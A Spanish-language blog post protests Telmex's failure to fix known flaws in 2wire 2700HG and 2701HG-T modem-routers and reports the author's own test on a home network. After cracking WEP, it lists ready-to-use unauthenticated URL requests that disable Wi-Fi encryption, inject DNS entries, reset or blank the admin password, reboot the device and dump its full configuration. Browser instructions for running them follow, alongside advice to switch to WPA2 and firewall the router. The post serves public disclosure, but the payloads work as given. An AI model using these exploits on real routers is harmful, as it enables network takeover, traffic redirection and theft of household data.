La frágil seguridad de los modems 2wire

La denuncia:
Antes de comenzar podría decirles que la siguiente información la publico solo para propósitos de enseñanza y esos choros, la verdad es que si lo hiciera sería un tanto hipócrita de mi parte pues lo hago para que se enteren de lo pobre que es la seguridad que nos ofrece el mayor de los proveedores de internet en México (si ese que están pensando!, el del monopolio y el perrito) "Telmex", esta es mi forma de protestar y a la vez informar de un fallo que no fue descubierto por mi, pero que de acuerdo a hkm (quien lo descubrió y lo hizo publico) fue notificado tanto a Telmex como a su proveedor de equipo 2wire (quien tiene contratos con otras compañías que ofrecen este servicio en el mundo como AT&T, Bell, BT Group, Telecom, etc) y hasta la fecha no se han corregido, a modo de pregunta puedo decir ¿hasta cuando?, ¿cuanto tiempo más hemos de soportar cargos injustos o por error en el sistema; cuanto tiempo más ha de conservar el monopolio de las comunicaciones?, eso solo el tiempo lo dira, desde aqui una queja contra su servicio y a estos si los debería de arrestar la PGR.

La investigación:
Desde hace ya más de dos años hkm publicó en su sitio www.hakim.ws una serie de vulnerabilidades en los modem-routers 2wire, este tipo de modem-router es muy común en México gracias a Telmex y su servicio de internet Prodigy Infinitum, a pesar de haber sido notificados tanto Telmex como 2wire, hasta la fecha no han ofrecido una solución eficiente para corregir estas vulnerabilidades.

La pregunta lógica ante una noticia como esta es ¿como puede afectarme a mi?, la respuesta es muy sencilla aunque explicarlo detalladamente puede llevar una buena cantidad de tiempo y además tendría que explicar una buena cantidad de ataques que son posibles gracias a este tipo de vulnerabilidad.

Por ahora basta decir que es algo preocupante y que como siempre nuestro querido proveedor de servicios no ha tomado en consideración, o no ha sabido resolver, dejando expuestos tanto a usuarios residenciales como empresariales al robo de información.

Para probar el alcance potencial de este tipo de ataques prepare el siguiente escenario:
  • Una pequeña red con recursos compartidos entre una PC y una Laptop, además de una impresora.

Metodología
  1. Reinicie el router a la configuración de fabrica (desconectar de la corriente, luego de unos segundos conectarlo nuevamente, presionar y mantener presionado el botón de reseteo)
  2. Adapate una red pequeña con dos equipos (una laptop y una pc) los cuales compartían una impresora (pc) y documentos (ambas)
  3. Realice una auditoria de seguridad inalámbrica usando Wifislax 3.1 y una tarjeta de red inalámbrica USB con chipset RTL8187
  4. Una vez obtenida la contraseña WEP, asocie la maquina atacante a la red y por último:
  5. Probé cada uno de esos comandos, en donde comprobé por mi mismo que funcionaban, además intente actualizar el sistema desde el panel de administración y resulto imposible, realice un escaneo de puertos y descubrí que el puerto 50001 se encontraba abierto por lo que pude reiniciar el router de manera remota.
Cabe señalar que esta prueba la hice con los modelos 2700 HG y 2701 HG-T de 2wire, en ambos casos la metología fue la misma.

Una vez con la introducción, aquí están los comandos que pueden ejecutarse y una breve descripción de lo que  hacen:

Deshabilitar la protección wireless
/xslt?PAGE=C05_POST&THISPAGE=C05&NEXTPAGE=C05_POST&NAME=encrypt_enabled&VALUE=0

Agregar una entrada DNS
/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.loquelesvengaengana.com&ADDR=66.102.7.99 (es la de google aunque pueden agregar las que les venga en gana)

Cambiar la contraseña por "admin"
/xslt?PAGE=H04_POST&THISPAGE=H04&NEXTPAGE=J33&PASSWORD=admin&PASSWORD_CONF=admin&HINT=

/xslt?PAGE=CD35_SETUP_01_POST&password1=admin&password2=admin&HINT=admin

Resetear la contraseña (dejarla en blanco) 
/xslt?PAGE=CD35_SETUP_01_POST&password1=(aquí 512 caracteres)&password2(aquí otros 512 caracteres)

Reiniciar el router
/xslt?page=%0d%0a

Reiniciar la conexión DSL
/xslt?page=%? (aunque para esto basta con cambiar el símbolo de interrogación por cualquier otro carácter que no sean letras)

Obtener la configuración completa del router
/xslt?page=mgmt_data

Los resultados
Tras obtener la contraseña WEP el realizar una intrusión y cambiar la configuración del router resulta ridículo, dicho tipo de intrusiones es común en México por vecinos a quien les compartimos el internet ya sea de manera consentida o no, sin embargo nos arriesgamos a ser victimas de fraude.

Para aquellos que alguna vez intentaron cambiar la configuración de su router sabrán que no miento y para hacer todos estos cambios de manera normal les solicita la contraseña, bueno ya no más (jeje), solo hace falta un poco de malicia y algo de imaginación para que esto pueda representar un riesgo de seguridad.


Acciones a tomar
Más allá de la responsabilidad de Telmex, es también una responsabilidad de nosotros como usuarios tomar las medidas mínimas de seguridad para prevenir este tipo de ataques en nuestros domicilios, dichas medidas comienzan sin duda alguna por configurar adecuadamente los servicios de internet inalámbrico a fin de prevenir intrusiones en nuestro router.

En la página que les mencione hay un buen manual en formato pdf que sin duda alguna les ayudara a corregir la configuración de su router, lo pueden obtener desde aquí o visitar la página para nutrirse con algo más de información, yo en lo personal les sugeriría cambiarlo por otro.

Dejen de usar WEP en la encriptación y configuren WPA o WPA2 con AES, además de usar una contraseña lo suficientemente grande.

Nota final 1
Para usar los comandos mencionados (probar si nuestro router es vulnerable):
Necesitamos 2 cosas
  1. La dirección  IP de nuestro router
  2. Un navegador web (yo recomiendo Firefox, aunque pueden usar el que les de la gana hasta el IExploer sirve)

Si no tienen la dirección:
Por default  es 192.168.1.254
Aunque si no funciona, también se puede obtener de la siguiente manera:
Abrir una terminal (win + r "cmd")
Escribir ipconfig /all
Buscar donde dice "Default gateway"  y anotar ese número
En el último de los casos:
usar "gateway.2wire.net" (sin las comillas obviamente)


Esta dirección seguida del comando que deseen probar se escribe en la barra de direcciones de nuestro navegador y acto seguido damos enter para ir (ejecutar).

Nota final 2
Aunque este fue un caso preparado, el escenario mostrado es el más común en las casas de personas que usan este tipo de conexión de internet, sin embargo se puede realizar este tipo de ataques en la red de cualquier oficina o cibercafé y resultar en un verdadero dolor de muelas para los administradores de estos sitios, en cuyo caso recomendaría ampliamente usar un firewall que niegue el acceso directo por medio de web al router y/o usar un servidor proxy con el mismo propósito.

Conclusiones
  • Telmex es un monopolio, por lo que no tiene intenciones de reparar este tipo de errores.
  • La seguridad de nuestra información es responsabilidad directa de nosotros mismos.
  • Hacer mal uso de esta información solo los afecta a ustedes pues su vecino puede estar leyéndolo y pensando en joder igual que ustedes a él, por lo que mejor tomen medidas preventivas y avisen a quien le interese.

Comentarios

  1. Anónimo10 de agosto de 2011, 20:13

    Me gustaría saber que usuario y password se ponen para entrar por el peurto 500001 de acceso remoto

    https:// ip :500001

    Me deja abrir un certificado y seguridad y luego me pide una contraseña y usuario.

    ResponderEliminar

Publicar un comentario

Tu opinión es importante compartela...

Entradas populares de este blog

Detener la sincronización de tiempo/fechas entre Host y Guest en Virtual Box

Imagen
Ésta es otra de esas entradas que surgieron a partir de una necesidad sencilla pero para la cual no hay mucha documentación y la que hay no es del todo clara. El problema en cuestión surge al intentar cambiar la fecha del sistema en nuestro SO huésped (virtualizado) y quedar frustrados tras varios intentos porque la fecha cambia después de unos segundos, esto se debe a que un servicio en concreto se encarga de hacerlo, éste servicio es parte de las "Guest Additions", suele ser de mucha ayuda, sin embargo en ocasiones conviene cambiar la fecha de nuestro sistema ya sea para registrar programas, alterar fechas de creación de documento, seguido de una larga lista de etcéteras. Para el caso de los huéspedes (Guests) Windows se llama "VboxService.exe" y se encuentra ubicado en la carpeta "System32"  y para los huéspedes Linux "vboxadd-timesync" y se encuentra instalado en "/etc/init.d". Asumiré que tienen instaladas las "Guest
Leer más

Extraer datos de un archivo.mdb (Access) con python

Luego de mucho tiempo fuera de línea, me decidí a escribir sobre algo que me pareció muy interesante, resulta que por azares del destino tuve que extraer la información de un archivo mdb y para colmo de males desde una MAC; al principio probé usar una herramienta llamada MDB Explorer , aunque su precio es accesible, la verdad es que me sentía un poco molesto de no poder hacerlo más a mi propio estilo, fue entonces que me puse a investigar como tener acceso al contenido de una base de datos de Access desde Python; encontré un par de librerías ( pyodbc y pypyodbc , de las cuales sólo funcionó la segunda al menos en MAC), pero aún no estaba satisfecho, fue entonces que por otro azar del destino encontré un scrip t que decía poder extraer el contenido de las tablas de una base de datos en formato CSV, luego de analizar el código de dicho script, me decidí a leer un poco más sobre el uso de la herramienta que en realidad hace el trabajo, fue así  que descubrí mbd-tools , así que sin más f
Leer más

Solución al problema con odbc pgsql (postgresql) en Windows 7 de 64 bits

Hace poco tuve que lidiar con la instalación de un driver ODBC para Postgresql desde Windows 7 (x64) la verdad es que normalmente no había tenido ningún problema para crear conexiones DSN, sin embargo por alguna extraña razón la versión "Home Basic" de este jodido sistema fue una piedrita en el zapato, como me dí cuenta de que es más común de lo que parece, decidí escribir este post a fin de compartir la solución con otros. El problema Según leí en la documentación en inglés, se deriva de que a "los genios de Microsoft" se les ocurrió dejar dos versiones del mismo programa encargado de generar los orígenes DSN ODBC (por aquello de las compatibilidades en el sistema) concretamente es un programa llamado "odbcad32.exe", hasta aquí tiene sentido y mi comentario sarcástico respecto al tema parece fuera de lugar (pero no uso el sarcasmo a la ligera), el problema es que la versión del programa de 32 bits esta alojada en la carpeta "C:\WINDOWS\SysWO
Leer más